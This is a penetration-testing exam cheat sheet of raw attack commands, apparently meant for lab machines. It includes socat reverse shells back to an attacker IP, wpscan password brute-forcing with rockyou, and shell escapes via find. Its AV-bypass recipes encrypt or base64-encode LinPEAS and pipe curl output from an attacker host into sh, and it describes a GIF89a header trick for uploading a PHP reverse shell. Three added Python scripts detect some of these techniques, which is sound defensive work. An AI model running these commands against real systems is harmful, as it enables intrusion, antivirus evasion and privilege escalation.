Exam Tips
Finding local.txt during privilege escalation
1. Using find Command:
The find command is powerful for locating specific files. Here are examples:
find / -type f -name "local.txt" 2>/dev/null
find / -type f -name "proof.txt" 2>/dev/null
/: Searches the entire filesystem.
-type f: Restricts the search to files.
-name "local.txt": Looks for files named local.txt.
2>/dev/null: Suppresses error messages from directories you don't have permission to access.
Shell upgrade to a full TTY:
python3 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color
Ctrl + Z
stty raw -echo ; fg ; reset
stty columns 200 rows 200
2. Using locate Command (if available):
The locate command is often faster, as it uses a database of files. Run:
locate local.txt
Note: This command might need sudo privileges to update its database (sudo updatedb), and it may not show recent files if the database isn't up-to-date.
3. Searching Common Sensitive Directories:
If you suspect local.txt is in specific directories (like a user's home or system directories), limit the search:
find /home /root /var -type f -name "local.txt" 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
4. Using grep on Filesystem Content (if content is known):
If you're aware of certain content within local.txt (e.g., flag content in CTF challenges), use:
grep -r "known content" / 2>/dev/null
These methods should help locate local.txt when performing privilege escalation tasks.
When you get a limited or reverse shell, you often need to stabilize it to improve functionality and usability. This typically involves upgrading it to a fully interactive shell, which enables you to use commands like Ctrl+C, arrow keys, tab completion, and copy-pasting more reliably. Here are some common methods:
1. Upgrade with Python
If the target machine has Python installed, you can use it to upgrade the shell:
python -c 'import pty; pty.spawn("/bin/bash")'
Or if Python 3 is available:
python3 -c 'import pty; pty.spawn("/bin/bash")'
After running this command, your shell will feel more stable. You can further improve it by setting terminal variables:
export TERM=xterm
2. Use script Command
The script command starts a new shell session and can sometimes improve stability:
script /dev/null -c bash
3. Upgrade with Socat
If both your machine and the target machine have socat installed, you can create a more stable reverse shell. Set up a listener on your machine:
socat file:`tty`,raw,echo=0 tcp-listen:4444
Then, on the target machine, initiate a connection back to your machine:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<your-ip>:4444
4. Using rlwrap for Command History and Editing
If you're using netcat to catch a shell, you can use rlwrap to wrap it for better line-editing and command history support:
rlwrap nc -lvnp 4444
5. Backgrounding and Using stty for Terminal Control
After upgrading with Python or another method, sometimes your shell may still not respond to Ctrl+C or other commands. To fix this:
Background the shell by pressing Ctrl+Z.
Set the terminal options on your own machine:
stty raw -echo; fg
Then press Enter. This will bring the shell back to the foreground, and it should now handle signals and other inputs correctly.
6. Setting Up SSH Tunneling (if possible)
If SSH access is available, consider setting up a reverse SSH tunnel or using SSH for a fully interactive session:
ssh -R 4444:localhost:4444 user@target
With these techniques, you should be able to stabilize your shell for better interactivity and control.
Note: to create a new password list with cewl for a specific website, use the command below:
cewl http://dc-2/ > passwordlist.txt

System enumeration
hostname
uname -a
cat /etc/issue
cat /proc/version
ps aux
lscpu
/bin/bash
Network enumeration
ifconfig
ipconfig
ip route
arp -a
ip neigh
netstat -ano
User Enumeration
/home
/etc/passwd
/etc/shadow
/etc/group
sudo -l
whoami
id
sudo su -
cat /etc/passwd
cat /etc/shadow
cat local.txt
Password Enumeration
sudo -l
find
ls -la
cat
locate filename
backup script
history
.bash_history
crontab
id_rsa
grep password -
grep --color=auto -rnw '/' -ie 'password' --color=always 2>/dev/null
bash -i
WPScan - Commands
wpscan --url http://funbox.fritz.box/ -e p,t,u -P /usr/share/wordlists/rockyou.txt
wpscan --url http://dc-2/ --disable-tls-checks -U users.txt -P cewl.txt
wpscan --url http://dc-2/ --disable-tls-checks --enumerate p --enumerate t --enumerate u
wpscan --url http://dc-2/ --disable-tls-checks --enumerate p,t,u
wpscan --url http://dc-2/ -U users.txt -P /usr/share/wordlists/rockyou.txt
wpscan --url http://blogger.pg/assets/fonts/blog/ --enumerate p --plugins-detection aggressive
wpscan --url http://funbox.fritz.box/ -e p,t,u
wpscan --url http://192.168.245.78/wordpress/ -e p,t,u -P /usr/share/wordlists/rockyou.txt
wpscan --url http://192.168.245.78/wordpress/ -U sosimpleusers.txt -P /usr/share/wordlists/rockyou.txt
Privilege Escalation Commands
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
find /bin -name nano -exec /bin/sh \;
find / -perm -u=s -type f 2>/dev/null
python -c 'import pty; pty.spawn("/bin/bash")'
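The two find commands above list setuid/setgid files, which is the same inventory a defender keeps to notice an unexpected set-id binary. The script below is an added example (not from these notes): it records set-id regular files with their mode and owner, diffs a later scan against a saved baseline, and lists set-id files outside the directories a package manager normally owns. The STANDARD_PREFIXES list and the scratch-tree demo are this example's own assumptions.

```python
"""Inventory setuid/setgid files and diff them against a baseline.

Added example; not from the original notes. It reproduces what the
`find / -perm -u=s -type f` and `-perm -g=s -o -perm -4000 ! -type l`
commands above report, but keeps the result so that a later run shows
which set-id files appeared, disappeared or changed.
"""
import json
import os
import stat
import sys
import tempfile
from typing import Dict, List

# Inventory: path -> "mode:uid:gid", stringified so it survives json.dump.
Inventory = Dict[str, str]

# Directories where set-id binaries are expected on a stock install (assumption:
# adjust for your distribution). A set-id file anywhere else deserves a look.
STANDARD_PREFIXES = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/")


def setid_flags(mode: int) -> str:
    """Return 'u', 'g', 'ug' or '' for the set-id bits on a regular file.

    Symlinks and other non-regular files yield '' (the `! -type l` / `-type f` filters).
    """
    if not stat.S_ISREG(mode):
        return ""
    flags = ""
    if mode & stat.S_ISUID:
        flags += "u"
    if mode & stat.S_ISGID:
        flags += "g"
    return flags


def scan_tree(root: str) -> Inventory:
    """Walk `root` and record every set-id regular file with its mode and owner.

    Unreadable directories are skipped silently, which is what 2>/dev/null hides
    in the shell version.
    """
    found: Inventory = {}
    for dirpath, _dirs, files in os.walk(root, onerror=lambda _e: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if setid_flags(st.st_mode):
                found[path] = f"{stat.S_IMODE(st.st_mode):04o}:{st.st_uid}:{st.st_gid}"
    return found


def diff_inventory(baseline: Inventory, current: Inventory) -> Dict[str, List[str]]:
    """Set-id files that are new, gone, or whose mode/owner differ from the baseline."""
    return {
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
        "changed": sorted(p for p in current if p in baseline and current[p] != baseline[p]),
    }


def outside_standard_dirs(inventory: Inventory) -> List[str]:
    """Set-id files living outside the directories a package manager normally owns."""
    return sorted(p for p in inventory if not p.startswith(STANDARD_PREFIXES))


def demo() -> Dict[str, List[str]]:
    """Scratch tree: one 'legitimate' setuid file in the baseline, one planted later."""
    with tempfile.TemporaryDirectory() as root:
        legit = os.path.join(root, "bin", "passwd-like")
        os.makedirs(os.path.dirname(legit))
        open(legit, "w").close()
        os.chmod(legit, 0o4755)
        baseline = scan_tree(root)
        planted = os.path.join(root, "tmp-shell")
        open(planted, "w").close()
        os.chmod(planted, 0o4755)
        return diff_inventory(baseline, scan_tree(root))


if __name__ == "__main__":
    # Usage: python3 setid_audit.py [root] [baseline.json]
    # With a baseline file present, prints the diff; otherwise prints the inventory.
    root = sys.argv[1] if len(sys.argv) > 1 else "/"
    current = scan_tree(root)
    if len(sys.argv) > 2:
        with open(sys.argv[2]) as fh:
            print(json.dumps(diff_inventory(json.load(fh), current), indent=2))
    else:
        print(json.dumps(current, indent=2))
```

Run it once on a freshly built host, keep the JSON, and re-run with that file as the second argument from a cron job; an entry under "added" is exactly what the find one-liners above would hand an attacker.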
Web Enumeration
gobuster dir -u http://192.168.235.193/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -b 404,401 -x php,asp,js,txt,htm
gobuster dir -k -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u $URL |tee gobuster
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt --hc 404 http://192.168.116.209:80/FUZZ
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-files.txt --hc 404 http://192.168.190.209:80/FUZZ
gobuster dir -u http://192.168.124.95/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
gobuster dir -e -u http://10.10.1.28 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,html,cgi,sh
gobuster dir -u http://10.10.1.24/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 4
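The gobuster and wfuzz runs above, like the wpscan enumeration commands earlier on this page, leave a distinctive trail in the web server's access log: a burst of requests from one client, most answered 404. The detector below is an added example, not part of these notes; it parses Apache/nginx "combined" log lines (the sample log is constructed), applies a sliding-window 404-rate rule and a User-Agent rule, and reports which clients tripped which rule. The threshold, the window and the SCANNER_UA fragments are this example's assumptions: all three tools let the operator change their User-Agent, so the rate rule is the one to rely on.

```python
"""Flag clients that look like they are brute-forcing paths on a web server.

Added example; not from the original notes. gobuster, wfuzz and wpscan as
used above generate a burst of requests, most answered with 404. This parses
Apache/nginx "combined" access-log lines (the sample below is constructed)
and reports a client that exceeds a 404 rate in a sliding window or whose
User-Agent names one of those tools. The User-Agent strings are assumed
defaults; all three tools let the operator change them.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from typing import Dict, List

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
SCANNER_UA = ("gobuster", "wfuzz", "wpscan")  # assumed default UA fragments


def parse_line(line: str) -> dict:
    """Combined-log line -> dict with typed status and timestamp; {} if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return {}
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def detect(lines, not_found_threshold: int = 20,
           window: timedelta = timedelta(seconds=60)) -> Dict[str, List[str]]:
    """Return {client_ip: [reasons]} for clients that trip either rule.

    Thresholds are assumptions; tune them to the site's normal 404 volume.
    """
    by_ip: Dict[str, list] = defaultdict(list)
    for rec in (parse_line(l) for l in lines):
        if rec:
            by_ip[rec["ip"]].append(rec)
    verdicts: Dict[str, List[str]] = {}
    for ip, recs in by_ip.items():
        reasons = []
        agents = {r["ua"].lower() for r in recs}
        named = [t for t in SCANNER_UA if any(t in ua for ua in agents)]
        if named:
            reasons.append("scanner user-agent: " + ", ".join(named))
        # Sliding window over the client's 404 timestamps.
        nf = sorted(r["ts"] for r in recs if r["status"] == 404)
        lo = 0
        for hi in range(len(nf)):
            while nf[hi] - nf[lo] > window:
                lo += 1
            if hi - lo + 1 >= not_found_threshold:
                reasons.append(f"{hi - lo + 1} 404s within {int(window.total_seconds())}s")
                break
        if reasons:
            verdicts[ip] = reasons
    return verdicts


def sample_log() -> List[str]:
    """Constructed log: one gobuster-style burst, one normal visitor, one slow 404 trickle."""
    base = datetime(2024, 5, 1, 12, 0, 0, tzinfo=timezone.utc)
    fmt = "%d/%b/%Y:%H:%M:%S %z"
    lines = []
    for i in range(25):  # 25 misses in 25 seconds, assumed gobuster default UA
        t = (base + timedelta(seconds=i)).strftime(fmt)
        lines.append(f'10.0.0.5 - - [{t}] "GET /dir{i}/ HTTP/1.1" 404 196 "-" "gobuster/3.6"')
    t = base.strftime(fmt)  # ordinary visitor with a single broken image link
    lines.append(f'192.168.1.10 - - [{t}] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"')
    lines.append(f'192.168.1.10 - - [{t}] "GET /missing.png HTTP/1.1" 404 196 "-" "Mozilla/5.0"')
    for i in range(25):  # 25 misses spread over 25 minutes: below the rate rule
        t = (base + timedelta(minutes=i)).strftime(fmt)
        lines.append(f'10.0.0.9 - - [{t}] "GET /old{i}.html HTTP/1.1" 404 196 "-" "Mozilla/5.0"')
    return lines


if __name__ == "__main__":
    for ip, why in detect(sample_log()).items():
        print(ip, "->", "; ".join(why))
```

Feed it a real log with `detect(open("/var/log/apache2/access.log"))`; the slow trickle from 10.0.0.9 in the sample shows why a plain 404 count per client is not enough and the window matters.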
Determining readable files in home directory:
find /home -readable 2>/dev/null
find / 2>/dev/null | grep "local.txt"
AV bypass
# OpenSSL encryption
openssl enc -aes-256-cbc -pbkdf2 -salt -pass pass:AVBypassWithAES -in linpeas.sh -out lp.enc
sudo python -m SimpleHTTPServer 80    # Start HTTP server
curl 10.10.10.10/lp.enc | openssl enc -aes-256-cbc -pbkdf2 -d -pass pass:AVBypassWithAES | sh    # Fetch and run on the victim
# Base64 encoded
base64 -w0 linpeas.sh > lp.enc
sudo python -m SimpleHTTPServer 80    # Start HTTP server
curl 10.10.10.10/lp.enc | base64 -d | sh    # Fetch and run on the victim
Enumerate users using nmap scripts
Some sites only accept image/GIF uploads; in that case put the line below at the top of the php-reverse-shell file so it passes the check:
GIF89a;
Grabbing id_rsa and logging in via SSH
Rustscan flags
rustscan -a 192.168.1.7 --ulimit 5000
rustscan -a 192.168.1.7
rustscan -a 192.168.1.7 -r 21-50
rustscan -a 192.168.1.7 -- -sC -sV
How to use LinPEAS/LinEnum in a few steps:
Download LinEnum or LinPEAS from GitHub to the victim machine.
Edit the permissions: chmod +x LinEnum.sh or chmod +x linpeas.sh
Run the script: ./LinEnum.sh or ./linpeas.sh
Download LinEnum/LinPEAS from your attacker machine to the victim machine:
Download LinEnum/linpeas.sh from GitHub to your own machine.
Host the file on your machine, which starts a local server on port 8000, by executing the following command: python3 -m http.server
Download the file from our server: wget <attacker ip>:8000/LinEnum.sh or wget <attacker ip>:8000/linpeas.sh
Edit the permissions: chmod +x LinEnum.sh / chmod +x linpeas.sh
Run the script: ./LinEnum.sh / ./linpeas.sh
Start python server
python -m SimpleHTTPServer 445
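The shell-stabilization commands earlier on this page, the AV-bypass fetch-and-run chains, and the LinPEAS/LinEnum steps just above all run as ordinary processes on the victim, so a process listing is where a responder first sees them. The triage script below is an added example (not from these notes): it reads `ps -eo user,pid,args` output (the sample is constructed) and flags the python pty / socat / script shell upgrades, `curl ... | openssl -d | sh` and `base64 -d | sh` chains, LinPEAS/LinEnum runs, and an ad-hoc python http.server. The rule names and regexes are this example's own assumptions, written from the commands on this page, and will need tuning on a real fleet.

```python
"""Triage a process listing for the post-exploitation patterns in these notes.

Added example; not from the original notes. Takes `ps -eo user,pid,args`
output (the sample below is constructed) and flags the command lines a
defender would want to see: the python pty / socat / script shell upgrades,
`curl ... | openssl -d | sh` and `base64 -d | sh` fetch-and-run chains,
LinPEAS/LinEnum runs, and an ad-hoc python http.server. Rule names and
patterns are this example's own; tune them before relying on them.
"""
import re
from typing import List, Tuple

RULES = [
    ("pty_shell_upgrade", re.compile(
        r"import\s+pty\s*;\s*pty\.spawn"            # python -c 'import pty; pty.spawn(...)'
        r"|script\s+/dev/null\s+-c\s+\S*(ba)?sh"     # script /dev/null -c bash
        r"|socat\s+exec:")),                         # socat exec:'bash -li',pty,...
    ("download_pipe_to_shell", re.compile(
        r"\b(curl|wget)\b.*\|.*\b(ba)?sh\b")),       # fetch | (decode |) sh
    ("privesc_enum_script", re.compile(r"linpeas|linenum", re.IGNORECASE)),
    ("adhoc_http_server", re.compile(r"python\d?\s+-m\s+(http\.server|SimpleHTTPServer)")),
]


def classify(cmdline: str) -> List[str]:
    """Names of every rule the command line matches, in RULES order."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan_ps(lines) -> List[Tuple[str, int, List[str]]]:
    """Parse `ps -eo user,pid,args` lines; return (user, pid, rules) for flagged processes."""
    flagged = []
    for line in lines:
        parts = line.split(None, 2)
        if len(parts) < 3 or not parts[1].isdigit():
            continue  # header line or malformed row
        user, pid, cmd = parts[0], int(parts[1]), parts[2]
        hits = classify(cmd)
        if hits:
            flagged.append((user, pid, hits))
    return flagged


# Constructed sample. ps shows the command line without the shell quoting,
# so the python -c argument appears unquoted, as it would on a real host.
SAMPLE_PS = """\
USER       PID COMMAND
root         1 /sbin/init
www-data  1337 python3 -c import pty; pty.spawn("/bin/bash")
www-data  1340 sh -c curl 10.10.10.10/lp.enc | openssl enc -aes-256-cbc -pbkdf2 -d -pass pass:X | sh
www-data  1344 wget 10.10.10.10:8000/linpeas.sh
www-data  1345 bash ./linpeas.sh
www-data  1350 socat exec:bash -li,pty,stderr,setsid,sigint,sane tcp:10.10.10.10:4444
alice     2001 python3 -m http.server
bob       2100 vim notes.txt
"""

if __name__ == "__main__":
    for user, pid, hits in scan_ps(SAMPLE_PS.splitlines()):
        print(f"{user:10} {pid:6} {', '.join(hits)}")
```

On a live host pipe the real listing in with `scan_ps(subprocess.check_output(["ps", "-eo", "user,pid,args"], text=True).splitlines())`; the web-server user (www-data here) spawning a pty or a fetch-and-run chain is the combination worth alerting on, since the same commands typed by an administrator in an SSH session are routine.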
Tools